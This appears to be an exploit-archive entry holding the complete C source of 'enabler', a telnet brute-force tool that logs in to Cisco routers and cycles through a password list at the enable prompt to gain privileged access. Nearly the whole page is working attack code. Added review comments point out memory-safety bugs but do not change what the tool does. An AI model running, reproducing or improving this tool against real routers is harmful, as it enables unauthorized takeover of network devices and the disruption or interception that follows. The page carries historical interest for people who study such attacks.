
Cisco Password Bruteforcer Exploit

🗓️ 24 Oct 2006 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 31 Views

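Brute-force tool for Cisco routers: it logs in to the router (password-only or username/password login) and then tries a list of passwords against the enable prompt. The author reports testing it on several router models.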

Code

                                                /*

             .: free source :. .: coded 4 Avatar Corp :.

        enabler.                      
        cisco internal bruteforcer.                    

                                             coder - norby   
                                           concept - anyone

    
  this program just logs into a CISCO router and tries a list of 
  passes looking for the enable one.
  it works in password-only CISCO as well in login-pass ones and 
  has been succesfully tested on many 2600 and a few 12008.
  the prog's concept [bruteforcing a router for gaining enable access] 
  is quite simple ...how amazing I haven't seen similar progs before!

  anti eleet&0day force ;)
  anyway... information wants to be free :) 

                      sciao belli

               saluti a berserker mandarine, acidcrash
               beho x la traduzione :)                                    

          norby
               saluti a *lei*, saluti a gabriella che a capodanno
               non ha voluto lasciare il ragazzo x fare un bambino con me ;) 
               saluti a tutti gli avatar, a sandman, a tutte le diecimila
               persone che conosco
          any
               saluti a Acida, storm\, Raid

 contact`    norby - [email protected]      anyone - [email protected]
                www.avatarcorp.org 


neural collapse _ i truly hope in this project

v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery 
            (very simple feature)     
*/



#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>

/* Status-line prefix: a "[`]" marker wrapped in ANSI colour escape sequences. */
#define BOX                     "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"

/* Process-wide state shared by every function below (no locking, single-threaded use). */
struct sockaddr_in addr;   /* peer address, filled in by sock() */
char host[100];            /* target as a dotted-quad string, written by resolve() */
struct hostent *hp;        /* gethostbyname() result used by resolve() */
int sock_stat;             /* descriptor returned by socket() in sock(); all reads and writes use it */

int n,x;                   /* n: index of the next candidate brute() sends; x: entries stored by loadwordlist() */
char **password;           /* candidate array allocated in loadwordlist(), terminated with a null entry */

/*
 * resolve - store the target's IPv4 address in the global `host` as text.
 *
 * inputhost: either a dotted-quad string or a host name.
 *
 * Input that sscanf() can parse as four dot-separated integers is copied
 * verbatim; anything else is looked up with gethostbyname() and the first
 * four bytes of the first returned address are formatted into `host`.
 * A failed lookup prints an error and exits the process.
 *
 * Declared `char`, but no value is returned.
 *
 * NOTE(review): strncpy() with the full buffer size (100) leaves `host`
 * without a terminator when inputhost is 100 characters or longer, and the
 * sscanf() test accepts trailing text after the fourth number.
 */
char resolve(char *inputhost) {

    int o1, o2, o3, o4;

    if (sscanf(inputhost, "%d.%d.%d.%d", &o1, &o2, &o3, &o4) == 4) {
        /* Already numeric: keep the caller's text as-is. */
        strncpy(host, inputhost, 100);
    } else {
        hp = gethostbyname(inputhost);
        if (hp == NULL) {
            printf("%s error on host resolving\n\033[0m\n", BOX);
            exit(0);
        }

        /* View the address bytes as unsigned so each octet prints as 0..255. */
        const unsigned char *octet = (const unsigned char *)hp->h_addr_list[0];
        sprintf(host, "%d.%d.%d.%d", octet[0], octet[1], octet[2], octet[3]);
    }
}
 
/*
 * sock - open the TCP connection that the other functions use.
 *
 * hostoresolve: unused; the address is taken from the global `host`.
 * port:         TCP port, converted with htons().
 *
 * Stores the descriptor in the global `sock_stat` and the peer address in
 * the global `addr`. Prints an error and exits the process if socket() or
 * connect() fails. Declared int, but no value is returned.
 *
 * NOTE(review): the result of inet_addr() is not checked before connect().
 */
int sock(char *hostoresolve,int port) {

    sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock_stat < 0) {
        printf("%s error opening socket\n\033[0m\n", BOX);
        exit(0);
    }

    addr.sin_family = PF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(host);

    if (connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
        printf("%s error opening connection\n\033[0m\n", BOX);
        exit(0);
    }
}

/*
 * banner - print the three-line start-up banner, each line prefixed with BOX.
 * Declared int, but no value is returned.
 */
int banner() {
    printf("\n%s enabler.\n"
           "%s         cisco internal bruteforcer. concept by anyone\n"
           "%s                                       coded by norby\n",
           BOX, BOX, BOX);
}
/*
 * usage - print the command-line synopsis and reset the terminal colour.
 * argv: the program name as invoked (main() passes argv[0]).
 * Declared int, but no value is returned.
 */
int usage(char *argv) {
    printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m",
           BOX, argv);
}

/*
 * sig - SIGINT handler installed by main().
 *
 * Reports how many candidates were sent (global `n`) when at least one was,
 * resets the terminal colour and exits with status 0.
 *
 * NOTE(review): printf() and exit() are not async-signal-safe functions.
 */
void sig() {
    if (n > 0) {
        printf("%s %i passwords tryed. no password matching. leaving\n", BOX, n);
    }

    printf("\n\033[0m");
    exit(0);
}

/*
 * login - answer the router's first login prompt on the open connection.
 *
 * login: username to send, or the sentinel "n0login" that main() passes
 *        when it was run without -u.
 * pass:  login password to send.
 *
 * Reads from sock_stat until a username prompt ("ogin:" / "sername:") or a
 * password prompt ("assword:") is seen, sends the matching credentials, each
 * followed by "\r\n", sleeps two seconds, then reads again and reports
 * success when a ">" appears. Exits the process when a username is demanded
 * but only the sentinel was supplied, or when "sername:" comes back after
 * the password was sent.
 *
 * Both credentials are echoed to stdout and written to the socket exactly as
 * given. Declared int, but no value is returned.
 *
 * NOTE(review): read() does not NUL-terminate, and `input` comes straight
 * from an unchecked malloc() that is never freed, so the strstr() calls can
 * scan past the bytes actually received; a full 4000-byte read leaves no
 * terminator at all.
 * NOTE(review): `reqlogin` is still uninitialised when the first loop ends
 * without matching a prompt (read() returning <= 0), yet it is tested below.
 */
int login(char *login, char *pass) {

    char *input = malloc(4000);
    int reqlogin;

    /* Phase 1: wait for the first prompt and decide whether a username is needed. */
    while (read (sock_stat, input, 4000) > 0) {      
     if(strstr(input,"ogin:")||strstr(input,"sername:")) { 
        if(!strcmp(login,"n0login")) { 
          printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX); 
          exit(0);
        }
        printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break; 
     } 
     if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; } 
     bzero(input,4000);
    }

    /* Phase 2: send the username, then wait for the password prompt. */
    if(reqlogin==1) {
      write(sock_stat,login,strlen(login)); 
      write(sock_stat,"\r\n",2);

      while(read(sock_stat,input,4000)>0) {
        /* NOTE(review): the ';' right after the if() ends that statement, so
           the break in the following block runs unconditionally after the
           first successful read. */
        if(strstr(input,"assword")); { break; }
      }
    }

    /* Phase 3: send the login password. */
    write(sock_stat,pass,strlen(pass)); 
    write(sock_stat,"\r\n",2);

    sleep(2);

    bzero(input,4000);

    /* Phase 4: classify the reply; ">" is taken as the unprivileged prompt. */
    while (read (sock_stat, input, 4000) > 0) {
      if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
  /*    if(strstr(input,"assword:")) {  
        printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0); 
      }*/ 
      if(strstr(input,"sername:")) {
        printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
      }
      bzero(input,4000);
    }
}

/*
 * loadwordlist - read the candidate file into the global `password` array.
 *
 * list: path of a text file with one candidate per line; lines starting
 *       with '#' and empty lines are skipped.
 *
 * Each kept line is copied into its own 32-byte allocation and the global
 * counter `x` is advanced; the array is closed with a null entry. The
 * process exits if the file cannot be opened, if the array allocation
 * fails, or if x ends up below 4. Declared int, but no value is returned.
 *
 * NOTE(review): the array is sized as the file length in BYTES, while every
 * stored line consumes sizeof(char *) bytes of it (plus one slot for the
 * terminator), so a file whose lines are shorter than a pointer overruns
 * the allocation. ftell()'s return value is not checked either.
 * NOTE(review): the fgets() result is ignored and the loop is driven by
 * feof(), so the iteration in which fgets() hits end-of-file still stores
 * whatever `buf` holds as one more entry. Lines longer than 31 characters
 * are split across several entries. The per-entry malloc(32) is unchecked.
 * NOTE(review): the x<4 test and the "at least 3" message disagree;
 * presumably the extra end-of-file entry is being counted - confirm.
 */
int loadwordlist(char *list) {
 
   FILE   *passlist;
   char   buf[32], fake; 
   int i,z;              /* `fake` and `z` are never used */

   if ((passlist = fopen(list, "r")) == NULL) { 
      printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list); 
      exit(0); 
   }

   (void)fseek(passlist, 0L, SEEK_END);       // (author) damn, this is a bit of a mental hack
   password = malloc(ftell(passlist));        // to allocate just the right amount of memory for the passlist :P
   if(password == NULL) { 
     printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
     exit(0);
   }  

   (void)fseek(passlist, 0L, SEEK_SET);

   while (!feof(passlist)) {
     fgets(buf, 32, passlist);
     if (buf[0] == '#' || buf[0] == '\n') continue;
     /* Cut the line at its newline. */
     for (i = 0; i < strlen(buf); i++)
         if (buf[i] == '\n') buf[i] = '\0';
     password[x] = malloc(32);
     strcpy(password[x], buf);
     memset(buf, 0, 32);
     x++;
   }
   password[x] = 0x0;   /* terminator entry */
   fclose(passlist);
   if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }

}

/*
 * brute - drive the "enable" dialogue with the loaded candidates.
 *
 * Sends "enable\r\n" on sock_stat, then loops: read up to 100 bytes, and
 *   - on "assword:" send password[n] plus "\r\n" and advance n,
 *   - on "#" report password[n-1] as the possible match and exit,
 *   - on ">" send "enable\r\n" again.
 * When n reaches x the function reports that nothing matched and exits.
 * Everything goes over the single connection opened by sock(); the function
 * never reconnects. Declared int; every exit path is exit(), nothing is
 * returned.
 *
 * NOTE(review): read() may fill all 100 bytes of `input`, leaving no NUL
 * terminator for the strstr() calls. The malloc(100) is unchecked and never
 * freed.
 * NOTE(review): if "#" is seen before any candidate was sent (n == 0), the
 * report line reads password[-1], which is outside the array.
 * NOTE(review): when read() returns <= 0 and `input` matches none of the
 * three markers, the outer while(1) repeats without blocking.
 */
int brute() {  // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)         
   
   char *input = malloc(100);
   int N;   /* never used */

   bzero(input,100);

   write(sock_stat,"enable",6);
   write(sock_stat,"\r\n",2);


   while(1) { 

     /* Read until one of the three markers shows up or the list is used up. */
     while(read(sock_stat,input,100)>0) {
       if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
       if(n+1==x) break;
       if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
       bzero(input,100);
     }
   
     /* "#" is taken as the privileged prompt: the candidate sent last is reported. */
     if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }

     if(strstr(input,"assword:")) {
       write(sock_stat,password[n],strlen(password[n]));
       write(sock_stat,"\r\n",2);
       n++; 
       bzero(input,100); 
       /* Only the printf is guarded by the if; fflush(stdout) runs every time. */
       if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout); 
       continue;
     } 
     /* Back at the unprivileged prompt: ask for enable again. */
     if(strstr(input,">")) {
       write(sock_stat,"enable\r\n",8); bzero(input,100); 
     }
   }
}

/*
 * main - parse the command line and run the steps in order.
 *
 * Accepted forms (see usage()):
 *   <ip> <pass> <passlist> [port]
 *   <ip> -u <user> <pass> <passlist> [port]
 * The port is 23 when none is given.
 *
 * Both branches call loadwordlist(), resolve(), sock(), login() and brute()
 * in that order; those functions call exit() themselves on the failures
 * they detect. No return statement is present.
 *
 * NOTE(review): the argc test only bounds argc to 4..7. With "-u" and fewer
 * than six arguments the code still reads argv[5] / argv[6], which are NULL
 * or past the end of argv. atoi() gives no way to reject a non-numeric port.
 */
int main(int argc, char *argv[]) {

    int port; 
     
    signal(SIGINT, sig);

    banner(); 
    if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }

    /* Username/password login form. */
    if(!strcmp(argv[2],"-u")) {
      if(argc==6) { port=atoi("23"); }
      else { port=atoi(argv[6]); } // (author) there is a stupid argc bug here that I don't feel like hunting down
                                   // I've got something on my mind :?-- Fixed :) 

      printf("%s\n",BOX);

      loadwordlist(argv[5]);
      resolve(argv[1]);
      sock(host, port);   /* sock() ignores its first argument and reads the global host */
      login(argv[3],argv[4]);
      brute();
    }

    /* Password-only login form; "n0login" is the sentinel login() checks for. */
    else {
      if(argc==4) { port=atoi("23"); }
      else { port=atoi(argv[4]); }
      printf("%s\n",BOX);

      loadwordlist(argv[3]);
      resolve(argv[1]);
      sock(host, port);
      login("n0login",argv[2]);
      brute();
    }
} 

                              
